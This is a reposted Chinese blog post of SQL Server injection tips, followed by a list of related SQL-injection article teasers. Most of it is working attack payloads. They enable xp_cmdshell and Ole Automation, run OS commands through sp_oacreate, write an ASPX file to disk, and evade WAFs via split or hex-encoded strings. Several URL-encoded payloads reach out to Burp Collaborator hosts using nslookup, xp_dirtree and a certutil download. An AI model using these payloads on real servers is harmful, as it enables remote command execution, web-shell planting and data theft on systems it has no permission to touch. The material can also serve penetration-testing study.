Sql server注入一些tips

Sql server注入一些tips 数据库入门数据库基础教程数据库 mysql 2017-02-25 02:02:02 321人浏览无得

摘要

　　 SQL Server环境测试: 几个特性: 1.sql server兼容性可以说是最差的。举例: select x from y where id=1 字符串查询 select x from y wh

Sql server注入一些tips
[数据库教程]

SQL Server环境测试:
几个特性:
1.sql server兼容性可以说是最差的。
举例:
select x from y where id=1
字符串查询
select x from y where id=‘1‘

这是会报错的,不允许的
select x from y where id="1"
假设y表有列名name,那么
select x from y where id="name" 为真。
那么利用这个特性我们可以爆破这个表的列名。
sql server下,挖掘注入就是用单引号(‘),双引号的场景很少,但是也有。

sql server不支持‘1‘-‘1‘=0这种运算，他会认为你是错误的，两个字符串无法进行相减,如果你是‘1‘-0他会进行类型转换不会出错。


修改:
update x set name=‘admin‘ where id=1
如果id处存在注入，那么本质上就是个where条件查询注入，查询怎么注入他就怎么注入。


update x set name="admin" where id=1 
他会报错，没有人会这样写,用双引号。

测试sql server 修改注入,只能是‘aaa‘+‘bbb‘=aaabbb，如果可以就是注入。 或者是‘aaa‘‘ 和‘aaa‘‘‘
除order by/group by外注入:
环境场景:当输入id->输出id相关数据,输入name，出现name相关数据，可能是order by还有可能是什么?
""是sql servr标识符,而不是字符串,他和Mysql不一样
还有可能是这样的: select "name" from x
那么你可以这样去探测:name","id


总结:测试sql server注入使用双引号测试的场景很少,尝试"是不明智的

　　　　sql server注入到命令执行一些tips:

基础:
开启xp_cmdshell
EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;

执行命令:
exec master..xp_cmdshell ‘ping dnslog‘

2.启用sp_oacreate
EXEC sp_configure ‘show advanced options‘, 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure ‘Ole Automation Procedures‘, 1;   
RECONFIGURE WITH OVERRIDE;

执行命令:
declare @shell int exec sp_oacreate ‘wscript.shell‘,@shell output exec sp_oamethod @shell,‘run‘,null,‘c:windowssystem32cmd.exe /c whoami >c:1.txt‘

;declare+%40shell+int+exec+sp_oacreate+‘wscript.shell‘,%40shell+output+exec+sp_oamethod+%40shell,‘run‘,null,‘c%3awindowssystem32
slookup.exe%20"Http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net"‘;


;declare+@f+int,@g+int;exec+sp_oacreate+%27Scripting.FileSystemObject%27,@f+output;EXEC+SP_OAMETHOD+@f,%27CreateTextFile%27,@f+OUTPUT,%27d:Dztsztadmin65.txt%27,1;EXEC+sp_oamethod+@f,%27WriteLine%27,null,%27<%@+Page+Language="C%23"%><%+Response.Write("hello,world");+%>%27--
3.调用sp_oamethod

关于bypass:
exec=execute
原语句:execute master..xp_dirtree ‘c:‘
改造:execute(‘master..xp_dirtree "c:" ‘)
再次改造:execute(‘master..xp_dirtree "im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net"‘ )

　　技术图片

bypass执行命令:
‘;execute(‘xp_c‘%2b‘mdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"‘);--%20111

开启xp_cmdshell bypass:
execute("sp_configure ‘show advanced options‘, 1");RECONFIGURE;execute("sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE");

sql server专属特性:
select 1e1select user 
相当于执行select 1e1 和select user,bypass waf
‘select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a


案例:
aspx/.net站点支持get/post/cookie

　　把get参数放到cookie中: 技术图片

Sql server注入一些tips

原文地址：https://www.cnblogs.com/piaomiaohonGChen/p/14602368.html

您可能感兴趣的文档:

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: Sql server注入一些tips

本文链接: https://www.lsjlt.com/news/8133.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑，方便收藏和打印～

下载Word文档

去做题

猜你喜欢

Sql server注入一些tips

　　 sql server环境测试: 几个特性: 1.sql server兼容性可以说是最差的。举例: select x from y where id=1 字符串查询 select x from y wh...

99+

2017-02-25

Sql server注入一些tips 数据库入门数据库基础教程数据库 mysql
第一次SQL注入

第一次sql注入 1.在sqlmap文件安装目录下输入打开cmd，输入： sqlmap.py 2. sqlmap.py -u url（url：目标地址） sqlmap.py -u http:/...

99+

2018-06-28

第一次SQL注入数据库入门数据库基础教程数据库 mysql
简单聊一聊SQL注入及防止SQL注入

目录SQL注入附防止sql注入的一些建议总结SQL注入 SQL注入是通过操作输入来修改事先定义好的SQL语句，对用户输入的字符串进行过滤，转义，限制或处理不严谨，导致用户可以通过输入...

99+

2022-11-13
SQL Server中WAITFOR DELAY注入的示例分析

这篇文章主要为大家展示了“SQL Server中WAITFOR DELAY注入的示例分析”，内容简而易懂，条理清晰，希望能够帮助大家解决疑惑，下面让小编带领大家一起研究并学习一下“SQL Server中WAITFOR DELAY注入的示例分...

99+

2023-06-04
一文搞懂SQL注入攻击

目录1. 前言2. SQL注入简介（1）SQL语言（2）SQL注入3. SQL注入步骤（1）发现漏洞（2）信息收集（3）攻击Web系统（猜解用户名和密码）（4）获取管理员权限4. 防范SQL注入（1）使用参数化查询或存储...

99+

2023-04-19

SQL注入攻击 SQL注入
一文了解pikachu的SQL注入

前言：本文章主要讲解关于pikachu的注入方式。目录前言：一、数字型注入（post）二、字符型注入（get）三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http he...

99+

2023-10-04

sql 数据库 mysql
sql注入有哪些参数

sql注入参数有：user(): 数据库用户，格式为user() @serverdatabase(): 当前数据库名称version(): 当前数据版本，例如5.x.x-n1等@@datadir: 数据库路径，通常用于load_file时猜...

99+

2022-10-12
sql注入语句有哪些

sql注入语句有：返回的是连接的数据库名：and db_name()>0获取连接用户名：and user>0将数据库备份到Web目录下面：;backup database 数据库名 to disk='c:\inetpub\wwwroot\1...

99+

2022-10-15
一文讲解Node+mysql对SQL注入

虽然现在不会直接使用原生NodeJS 的方式开发后台，但了解一下 SQL注入还是很有必要的。本文使用 NodeJS + MySQL 对 SQL注入进行讲解。SQL注入攻击是很古老的攻击方式了，自从 web2.0 诞生后就有 SQL注...

99+

2022-11-22

Node.js 后端
SQL Server数据库sql优化注意事项都有哪些

SQL Server数据库sql优化注意事项都有哪些，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。今天主要分享下sqlserver数据库在做s...

99+

2022-10-19
sql注入的方式有哪些

这篇文章主要讲解了“sql注入的方式有哪些”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“sql注入的方式有哪些”吧！ sql注入...

99+

2022-10-18
SQL注入的原理有哪些

本篇文章给大家分享的是有关SQL注入的原理有哪些，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。一、什么是sql注入？1、什么是sql注入呢？&...

99+

2022-10-18
sql注入的一般流程是什么

sql注入的一般流程是：判断环境，寻找注入点，判断数据库类型。根据注入参数类型，重构SQL语句的原貌。将查询条件替换成SQL语句，猜解表名以及字段名。在表名和列名猜解成功后，再使用SQL语句得出字段的值。...

99+

2022-10-08
一篇文章了解SQL注入漏洞

目录SQL注入漏洞原理SQL注入内容注入条件SQL注释符与注入流程SQL注入分类SQLMap 分类接受请求类型区分注入数据类型的区分SQL注入思路手工注入思路SQL 详细注入过程总结...

99+

2022-11-13
Sql Server的一些知识点定义总结

数据库完整性：是指数据库中数据在逻辑上的一致性、正确性、有效性和相容性　　实体完整性（Entity Integrity 行完整性）：实体完整性指表中行的完整性。主要用于保证操作的数据（记录）非空、唯一且不...

99+

2022-10-18
SQL注入漏洞分类有哪些

SQL注入漏洞分类有：带内SQLi，也叫经典SQLi，攻击者可以在同一个信道里进行攻击，并且拿到结果。推测SQL注入，这种攻击方式下，攻击者并不能在带内看到SQLi成功的数据结果，但是可通过构造大量的SQL语句，通过观察返回的响应来推测数据...

99+

2022-10-22
sql注入报错方式有哪些

sql注入报错方式有12种，分别是：通过floor报错，注入语句如下：and select 1 from (select count(*),concat(ver...

99+

2022-10-10
sql注入攻击危害有哪些

sql注入攻击危害有：泄露数据库中用户的隐私信息。数据库被恶意操作，数据库的系统管理员帐户被篡改。上传asp木马病毒，进行挂马攻击。通过操作数据库对特定网页进行篡改。破坏硬盘数据，瘫痪全系统。...

99+

2022-10-24
sql注入攻击种类有哪些

sql注入攻击种类有：没有过滤转义字符、错误的类型处理、数据库服务器中的漏洞、盲目SQL注入式攻击等。没有正确过滤转义字符，在用户的输入没有为转义字符过滤时，就会发生这种形式的注入式攻击，它会被传递给一个SQL语句，例如：statement...

99+

2022-10-09
sql注入要过滤哪些字符

sql注入要过滤的字符有：--,#,//（，）括号||,+, （空格）连接符' 单引号|（竖线符号）& （& 符号）;（分号）$（美元符号）%（百分比符号）@（at 符号）'（单引号）"（引号）\'（反斜杠转义单引号）\"（反斜杠转义引号）...

99+

2022-10-17